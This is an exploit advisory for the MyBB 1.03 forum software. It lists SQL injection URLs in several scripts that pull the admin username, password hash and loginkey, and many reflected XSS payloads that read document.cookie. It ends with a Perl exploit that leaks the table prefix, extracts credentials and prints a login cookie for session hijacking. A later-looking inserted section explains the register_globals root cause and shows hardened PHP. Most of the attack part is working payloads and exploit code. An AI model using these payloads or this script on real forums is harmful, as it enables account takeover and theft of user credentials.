
MyBB-1.03.txt

Posted Feb 14, 2006
Authored by HACKERS PAL

MyBB 1.03 suffers from multiple SQL injection vulnerabilities. POC included.

tags | exploit, vulnerability, sql injection
SHA-256 | 3250723929f4f892ca5103634e9526bb328af14b440cef3affc11ab7bae31b85

Multiple Injections in MyBB 1.03

All injections and vulnerabilities discovered by: HACKERS PAL

Two days ago I thought to download the new MyBB forum version files, and there was the disaster.

There are many XSS and SQL injections in the new protected version...

And I made an exploit which gets the table prefix and gives you the admin information and the cookie value which you should set.

The mods forum is affected by all the vulnerabilities, but the main forum and some old versions are not.

url : http://mods.mybboard.com/forum/index.php

0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

SQL injections
in misc.php

Get The Admin username
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Get The Admin password
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Get The Loginkey
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

in private.php

private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

After adding the values, click the [Or Select a Buddy:] options: the first one shows the admin's user name, the second the password hash, and the third the loginkey.

in showteam.php
user name
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*

password
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*

loginkey
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*

in usercp.php
user name
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*

user password
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*

user loginkey
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
----------------------------------------------------
XSS injections

In any file in the forum, for example forumdisplay.php?fid=1, append the following to the URL:

&"></a><script>alert(document.cookie);</script>&


-----------------------------------------------------
if the forum is closed
global.php?bbclosedwarning=<script>alert(document.cookie);</script>

in index.php
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>

in calendar.php
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=<script>alert(document.cookie);</script>
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylist=<script>alert(document.cookie);</script>
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(document.cookie);</script>

in editpost.php
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie);</script>

in forumdisplay.php
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie);</script>
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>

These vulnerabilities work only when the forum is a threads forum:
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>

in memberlist.php
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</script>

in misc.php
misc.php?action=help&GLOBALS[]=1&sections=<script>alert(document.cookie);</script>
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.cookie);</script>
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cookie);</script>

in online.php
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.cookie);</script>

in portal.php
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</script>
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>

in private.php
private.php?GLOBALS[]=1&messagelist=<script>alert(document.cookie);</script>
private.php?action=tracking&GLOBALS[]=1&readmessages=<script>alert(document.cookie);</script>
private.php?action=tracking&GLOBALS[]=1&unreadmessages=<script>alert(document.cookie);</script>
private.php?action=folders&GLOBALS[]=1&folderlist=<script>alert(document.cookie);</script>
private.php?action=folders&GLOBALS[]=1&newfolders=<script>alert(document.cookie);</script>

in showteam.php
showteam.php?GLOBALS[]=1&usergrouprows=<script>alert(document.cookie);</script>
showteam.php?GLOBALS[]=1&usergroups=<script>alert(document.cookie);</script>

in showthread.php
showthread.php?tid=1&GLOBALS[]=1&posts=<script>alert(document.cookie);</script>

if there is a poll in the thread
showthread.php?tid=1&GLOBALS[]=1&polloptions=<script>alert(document.cookie);</script>

in stats.php
stats.php?GLOBALS[]=1&mostreplies=<script>alert(document.cookie);</script>

in usercp.php
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&returndatesel=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&select=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&requiredfields=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&customfields=<script>alert(document.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&langoptions=<script>alert(document.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&tppoptions=<script>alert(document.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&pppoptions=<script>alert(document.cookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&folder="><script>alert(document.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&folder=<script>alert(document.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=<script>alert(document.cookie);</script>
usercp.php?action=avatar&GLOBALS[]=1&galleries=<script>alert(document.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&buddylist=<script>alert(document.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=<script>alert(document.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&newlist=<script>alert(document.cookie);</script>
usercp.php?action=drafts&GLOBALS[]=1&drafts=<script>alert(document.cookie);</script>
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=<script>alert(document.cookie);</script>
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=<script>alert(document.cookie);</script>
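All of the SQL injection and XSS URLs above share one root cause, and the snippet below models it. This is an added example, not MyBB's code, and the query and template shapes in it are assumptions chosen so that the advisory's own payloads fit: with register_globals on (the PHP 4 era default; the directive was removed in PHP 5.4), every request parameter becomes a PHP global, so a variable the script reads before initialising it (the sql, comma, buddysql and ignoresql parameters in the SQL injection URLs, and onlinemembers, threads, folder and the rest in the XSS URLs) is attacker-controlled. The GLOBALS[]=1 parameter that every PoC URL carries is not modelled; the example assumes the request value has already landed in the global.

```php
<?php
// Added example, not MyBB's own code. Models the bug class behind the advisory:
// with register_globals=On a request parameter becomes a PHP global, so a
// variable that is read before it is initialised is attacker-controlled.
// Query and template shapes are assumptions, not the forum's originals.

// The advisory's misc.php?action=buddypopup&sql=... payload, URL-decoded and
// with the null run shortened. The nulls pad the UNION to the width of the
// original SELECT so MySQL accepts it.
$payload = "-2) union select uid,username,null,null,null from mybb_users where uid=1/*";

// Emulates register_globals: ?sql=<payload> creates $sql before the script runs.
$sql = $payload;

// --- Vulnerable shape --------------------------------------------------------
function buddy_query_vulnerable(array $buddy_uids): string
{
    global $sql;                       // never reset, so it starts as the request value
    foreach ($buddy_uids as $uid) {
        $sql .= ',' . $uid;            // intended to build "1,2,3"
    }
    return "SELECT u.* FROM mybb_users u WHERE u.uid IN ({$sql})";
}

// --- Hardened shape ----------------------------------------------------------
function buddy_query_hardened(array $buddy_uids): string
{
    $ids = array_map('intval', $buddy_uids);   // local, initialised, integers only
    if (count($ids) === 0) {
        return '';                             // nothing to look up
    }
    $sql = implode(',', $ids);
    return "SELECT u.* FROM mybb_users u WHERE u.uid IN ({$sql})";
}

// Same root cause for the reflected XSS list: an output variable such as
// $onlinemembers is interpolated into the page without being set first.
$onlinemembers = '<script>alert(document.cookie);</script>';   // from ?onlinemembers=...

function online_block_vulnerable(): string
{
    global $onlinemembers;             // request-controlled when the script never assigns it
    return "<div class=\"online\">{$onlinemembers}</div>";
}

function online_block_hardened(array $names): string
{
    $escaped = array();
    foreach ($names as $name) {
        $escaped[] = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    }
    $onlinemembers = implode(', ', $escaped);  // always derived locally, never from the request
    return "<div class=\"online\">{$onlinemembers}</div>";
}

echo buddy_query_vulnerable(array()), "\n";
echo buddy_query_hardened(array('7', '9 or 1=1')), "\n";
echo online_block_vulnerable(), "\n";
echo online_block_hardened(array('<script>alert(1)</script>')), "\n";
```

With an empty buddy list the vulnerable builder emits IN (-2) union select ... where uid=1/*), where the trailing /* comments out the original closing parenthesis, which is exactly why every payload in the advisory opens with -2) and ends with /*. The hardened builder initialises the list locally and casts every element with intval, so a value such as "9 or 1=1" collapses to 9; the hardened template helper both assigns the output variable itself and HTML-escapes each name. Turning register_globals off removes the injection vector entirely, but initialising every variable before use is still the fix a code review should insist on, because the same uninitialised-variable pattern is reachable through other means than request globals.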

-----------------------------------------

--- The Exploit ---

#!/usr/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL          #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR          #
#// Special Greets For SG (SecurityGurus) Team And Members      #
#// http://WwW.SoQoR.NeT                                        #
#//-------------------------------------------------------------#

use strict;
use warnings;
use LWP::Simple;

print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL               #";
print "\n# Http://WwW.SoQoR.NeT                              #";
if(!$ARGV[0] or !$ARGV[1]) {
    print "\n# -- Usage:                                         #";
    print "\n# -- perl $0 [Full-Path] [User ID]                  #";
    print "\n# -- Example:                                       #";
    print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1      #";
    print "\n# Greets To Devil-00 - Abducter - GaCkeR            #";
    print "\n#####################################################\n";
    exit(0);
}
print "\n# Greets To Devil-00 - Abducter - GaCkeR            #";
print "\n#####################################################";

my $web = $ARGV[0];
$web =~ s{/+$}{};                 # strip a trailing slash so "$web/$url" has no double slash
my $id  = $ARGV[1];

# Step 1: comma=/* leaves the showteam.php query unterminated, so the MySQL error
# page echoes "FROM <prefix>users u WHERE ..." and leaks the table prefix.
my $page = get("$web/showteam.php?GLOBALS[]=1&comma=/*")
    || die "[-] Unable to retrieve: $!";
my $prefix = ($page =~ m/FROM (.*)users u WHERE/) ? $1 : "mybb_";   # fall back to the default prefix

# Step 2: UNION one column of <prefix>users into the team listing. The column list
# must match the width of the original query, hence the run of nulls; the value
# is rendered inside <b><i>...</i></b> on the resulting page. Returns undef when
# the page does not contain it (the original script tested $1, which keeps the
# value of the previous successful match after a failed one).
sub fetch_column {
    my ($col) = @_;
    my $url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,$col,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20${prefix}users%20where%20uid=$id/*";
    my $html = get("$web/$url") || die "[-] Unable to retrieve: $!";
    return ($html =~ m/<b><i>(.*)<\/i><\/b>/) ? $1 : undef;
}

print "\n[+] Connected to: $web\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";

my $username = fetch_column("username");
print defined $username ? "\n[+] User Name : $username" : "\n[-] Unable to retrieve User Name\n";

my $hash = fetch_column("password");
die "\n[-] Unable to retrieve The Hash of password\n" unless defined $hash;
print "\n[+] Md5 Hash of Password : $hash\n";

print "\n[!] Watch out ... The Cookie Value is coming\n";
my $loginkey = fetch_column("loginkey");
if(defined $loginkey) {
    # The mybbuser cookie is "<uid>_<loginkey>"; setting it logs in as that user
    print "[+] Cookie [mybbuser] Value:-\n[*] ${id}_${loginkey}\n";
} else {
    print "[-] Unable to retrieve Login Key\n";
}

# WwW.SoQoR.NeT